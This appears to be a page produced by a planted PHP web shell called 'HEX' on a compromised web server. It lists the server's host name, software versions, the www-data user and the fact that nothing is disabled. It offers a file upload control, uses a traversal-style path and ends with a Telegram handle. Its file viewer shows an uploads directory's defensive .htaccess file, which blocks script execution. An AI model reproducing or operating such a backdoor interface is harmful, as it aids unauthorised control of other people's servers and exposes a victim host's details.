( ′∀`)σ≡σ☆))Д′)レ(゚∀゚;)ヘ=З=З=Зε≡(ノ´_ゝ`)ノ HEX
HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux mail.thebrand.ai 6.8.0-107-generic #107-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 13 19:51:50 UTC 2026 x86_64
User: www-data (33)
PHP: 8.3.6
Disabled: NONE
$ pwd: /var/www/html/tmpr/../tmpr/../tmpr/../tmpr/../tmpr/../iapi/uploads/
Upload Files
File: /var/www/html/tmpr/../tmpr/..//tmpr/../tmpr/..//tmpr/..//iapi/uploads/.htaccess
# Don't list directory contents
Options -Indexes

# Block double extensions from being uploaded or accessed, including htshells
<FilesMatch ".*\.([^.]+)\.([^.]+)$">
Order Deny,Allow
Deny from all
</FilesMatch>

# Disable script execution
<Files ~ "\.(deb|phps|phtml|js|php)$">
Order Deny,Allow
Deny from all
</Files>

<Files ~ "^.*\.([Pp][Hh][Pp])">
    order allow,deny
    deny from all
    satisfy all
</Files>

AddHandler cgi-script .php .php3 .php4 .phtml .pl .py .jsp .Asp .htm .shtml .sh .cgi .txt
Options -ExecCGI

<FilesMatch "\.(htpasswd|ini|phps|fla|psd|log|sh)$">
Order Allow,Deny
Deny from all
</FilesMatch>
@ Telegram